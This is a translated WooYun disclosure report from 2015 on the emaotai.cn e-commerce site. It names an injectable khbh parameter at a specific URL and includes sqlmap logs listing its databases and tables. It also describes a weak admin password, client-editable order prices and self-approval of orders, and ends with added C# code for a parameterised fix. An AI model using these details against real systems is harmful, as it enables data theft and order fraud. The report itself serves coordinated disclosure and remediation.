
Vulnerability summary

Defect ID: wooyun-2015-0152877

Title: E-commerce security: SQL injection in the e-Maotai main site (buy Moutai, the national liquor, for free / large-scale user information leak)

Affected vendor: emaotai.cn

Author: 路人甲

Submitted: 2015-11-09 09:36

Fixed: 2015-12-24 09:46

Published: 2015-12-24 09:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-09: Details sent to the vendor, awaiting vendor action
2015-11-09: Vendor confirmed; details visible to the vendor only
2015-11-19: Details disclosed to core white hats and domain experts
2015-11-29: Details disclosed to regular white hats
2015-12-09: Details disclosed to intern white hats
2015-12-24: Details disclosed to the public

Brief description:

E-commerce security: SQL injection in the e-Maotai main site (large-scale user information leak / buy Moutai, the national liquor, for free)

Detailed description:

The Moutai main site:

http://www.emaotai.cn/

[Screenshot: QQ20151108-0.png]

[Screenshot: QQ20151108-1.png]

[Screenshot: QQ20151108-2.png]


There is also a Double Eleven promotion running.
A weak password gets you into the back-office.

[Screenshot: QQ20151108-3.png]


www.emaotai.cn:90/zyd/Member/HyReg.aspx?khbh=20130523000007&op=2&ReturnPage=HyList2.aspx


The khbh parameter is injectable.

[Screenshot: QQ20151108-4.png]


There are 18 databases.

[Screenshot: QQ20151108-5.png]


Moutai lives up to its name as the national liquor: the amount of back-end data is absurd, so I did not enumerate it all.

[22:04:01] [INFO] fetching database names
[22:04:01] [INFO] the SQL query used returns 18 entries
[22:04:01] [INFO] resumed: distribution
[22:04:01] [INFO] resumed: DrpEco
[22:04:01] [INFO] resumed: drpecosdl
[22:04:01] [INFO] resumed: DrpEcoTest
[22:04:01] [INFO] resumed: eAct
[22:04:01] [INFO] resumed: eActTest
[22:04:01] [INFO] resumed: emaotai_act
[22:04:01] [INFO] resumed: emaotai_act_test
[22:04:01] [INFO] resumed: emaotai_logs
[22:04:01] [INFO] resumed: hishop
[22:04:01] [INFO] resumed: master
[22:04:01] [INFO] resumed: model
[22:04:01] [INFO] resumed: moutai
[22:04:01] [INFO] resumed: moutaitest
[22:04:01] [INFO] resumed: msdb
[22:04:01] [INFO] resumed: ReportServer
[22:04:01] [INFO] resumed: ReportServerTempDB
[22:04:01] [INFO] resumed: tempdb
[22:04:01] [INFO] fetching tables for databases: DrpEco, DrpEcoTest, ReportServer, ReportServerTempDB, distribution, drpecosdl, eAct, eActTest, emaotai_act, emaotai_act_test, emaotai_logs, hishop, master, model, moutai, moutaitest, msdb, tempdb
[22:04:01] [INFO] the SQL query used returns 237 entries
[22:04:01] [INFO] the SQL query used returns 39 entries
[22:04:01] [INFO] the SQL query used returns 68 entries
[22:04:01] [INFO] retrieved: dbo.t_xtgl_rjmkbmb
[22:04:02] [INFO] retrieved: dbo.t_xtgl_spjg
[22:04:02] [INFO] retrieved: dbo.t_xtgl_spml
[22:04:02] [INFO] retrieved: dbo.t_xtgl_xzqh
[22:04:02] [INFO] retrieved: dbo.t_xtgl_xzsf
[22:04:02] [INFO] the SQL query used returns 27 entries
[22:04:02] [INFO] retrieved: dbo.act_info
[22:04:02] [INFO] retrieved: dbo.act_photo
[22:04:03] [INFO] retrieved: dbo.act_purchase_log
[22:04:03] [INFO] retrieved: dbo.act_result
[22:04:03] [INFO] retrieved: dbo.act_result_bak_201528
[22:04:04] [INFO] retrieved: dbo.act_result_coupon
[22:04:04] [INFO] retrieved: dbo.act_rule
[22:04:04] [INFO] retrieved: dbo.act_sys_config
[22:04:04] [INFO] retrieved: dbo.act_ticket_a
[22:04:05] [INFO] retrieved: dbo.act_ticket_b
[22:04:05] [INFO] retrieved: dbo.act_ticket_c
[22:04:05] [INFO] retrieved: dbo.act_ticket_d
[22:04:05] [INFO] retrieved: dbo.act_ticket_e
[22:04:06] [INFO] retrieved: dbo.act_ticket_f
[22:04:06] [INFO] retrieved: dbo.act_ticket_test
[22:04:06] [INFO] retrieved: dbo.act_vote
[22:04:06] [INFO] retrieved: dbo.act_vote_detail
[22:04:06] [INFO] retrieved: dbo.act_wx_share_log
[22:04:06] [INFO] retrieved: dbo.act_wx_userinfo
[22:04:07] [INFO] retrieved: dbo.draw_user
[22:04:07] [INFO] retrieved: dbo.gift_detail
[22:04:07] [INFO] retrieved: dbo.gift_list
[22:04:07] [INFO] retrieved: dbo.gift_ticket
[22:04:07] [INFO] retrieved: dbo.Log_sms_result
[22:04:08] [INFO] retrieved: dbo.t_weixin_act
[22:04:11] [INFO] retrieved: dbo.ticket_b
[22:04:11] [INFO] the SQL query used returns 142 entries
^C
[22:04:51] [WARNING] user aborted during enumeration. sqlmap will display partial output
[22:04:51] [INFO] the SQL query used returns 229 entries
[22:04:52] [INFO] retrieved: dbo.backupfile
[22:04:52] [INFO] retrieved: dbo.backupfilegroup
[22:04:52] [INFO] retrieved: dbo.backupmediafamily
[22:04:52] [INFO] retrieved: dbo.backupmediaset
[22:04:52] [INFO] retrieved: dbo.backupset
[22:04:53] [INFO] retrieved: dbo.log_shipping_monitor_alert
[22:04:53] [INFO] retrieved: dbo.log_shipping_monitor_error_detail
[22:04:53] [INFO] retrieved: dbo.log_shipping_monitor_history_detail
[22:04:53] [INFO] retrieved: dbo.log_shipping_monitor_primary
[22:04:54] [INFO] retrieved: dbo.log_shipping_monitor_secondary
[22:04:54] [INFO] retrieved: dbo.log_shipping_primaries
[22:04:54] [INFO] retrieved: dbo.log_shipping_primary_databases
[22:04:54] [INFO] retrieved: dbo.log_shipping_primary_secondaries
[22:04:55] [INFO] retrieved: dbo.log_shipping_secondaries
[22:04:55] [INFO] retrieved: dbo.log_shipping_secondary
^C
[22:04:55] [WARNING] user aborted during enumeration. sqlmap will display partial output
[22:04:55] [INFO] the SQL query used returns 224 entries
[22:04:55] [INFO] retrieved: dbo.dtproperties
^C
[22:04:56] [WARNING] user aborted during enumeration. sqlmap will display partial output
[22:04:56] [INFO] the SQL query used returns 573 entries
[22:04:56] [INFO] retrieved: dbo.atest
^C
[22:04:57] [WARNING] user aborted during enumeration. sqlmap will display partial output
[22:04:57] [INFO] the SQL query used returns 13 entries
[22:04:57] [INFO] resumed: dbo.ChunkData
[22:04:57] [INFO] retrieved: dbo.ChunkSegmentMapping
[22:04:57] [INFO] retrieved: dbo.DBUpgradeHistory
^C
[22:04:57] [WARNING] user aborted during enumeration. sqlmap will display partial output
[22:04:58] [INFO] the SQL query used returns 199 entries
[22:04:58] [INFO] retrieved: dbo.aspnet_MemberGrades
^C
[22:04:58] [WARNING] user aborted during enumeration. sqlmap will display partial output
[22:04:58] [INFO] the SQL query used returns 364 entries


Now the key point: the price can be changed at will before placing the order, so Moutai can be bought for free.

[Screenshot: QQ20151108-6.png]

[Screenshot: QQ20151108-7.png]


After buying, I could approve the order myself.

[Screenshot: QQ20151108-8.png]


So Moutai worth several thousand yuan can be had for one fen. I did not place the order; please fix this quickly.
A large amount of customer information is also leaked.
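The two application-side defects above (khbh spliced into SQL, and a client-editable price at checkout) and their fixes, as an added example that is not code from the original report or from emaotai.cn: a hardened ASP.NET Web Forms code-behind for a member-lookup page like HyReg.aspx. The table and column names (t_member, khbh, name, t_product, price), the connection-string name "Drp", and the lblName label control are assumptions.

```csharp
// Added example, not emaotai.cn's code. Table/column names, the "Drp"
// connection string and the lblName control are assumptions.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;
using System.Web.UI;

public partial class HyReg : Page
{
    // khbh values in the report look like 14-digit customer numbers (assumption).
    private static readonly Regex KhbhShape = new Regex(@"^\d{14}$");

    protected void Page_Load(object sender, EventArgs e)
    {
        // Vulnerable pattern behind the report: the query-string value is spliced
        // into SQL text, e.g. "... WHERE khbh='" + Request["khbh"] + "'", so a
        // crafted value rewrites the statement. Hardened: validate, then bind.
        string khbh = Request.QueryString["khbh"];
        if (khbh == null || !KhbhShape.IsMatch(khbh)) { Response.StatusCode = 400; Response.End(); return; }

        string cs = ConfigurationManager.ConnectionStrings["Drp"].ConnectionString;
        using (var cn = new SqlConnection(cs))
        using (var cmd = new SqlCommand(
            "SELECT khbh, name FROM t_member WHERE khbh = @khbh", cn))
        {
            // Bound parameter: sent to SQL Server as data, never parsed as SQL.
            cmd.Parameters.Add("@khbh", SqlDbType.VarChar, 14).Value = khbh;
            cn.Open();
            using (SqlDataReader r = cmd.ExecuteReader())
            {
                if (r.Read()) lblName.Text = Server.HtmlEncode(r.GetString(1));
            }
        }
    }

    // Checkout total: the unit price comes from the catalogue row, not from a
    // form field, so an edited price field in the request has no effect.
    public static decimal OrderTotal(SqlConnection cn, int productId, int qty)
    {
        if (qty < 1) throw new ArgumentOutOfRangeException("qty");
        using (var cmd = new SqlCommand("SELECT price FROM t_product WHERE id = @id", cn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = productId;
            object price = cmd.ExecuteScalar();
            if (price == null) throw new ArgumentException("unknown product");
            return (decimal)price * qty;
        }
    }
}
```

The same separation applies to the approval step the report mentions: the account that places an order should not be the one that approves it.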

[Screenshot: QQ20151108-9.png]


Proof of vulnerability:

Proven.

Suggested fix:

Copyright notice: please credit 路人甲@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-11-09 09:45

Vendor reply:

Thanks to 路人甲 for the report.

Latest status:

None yet.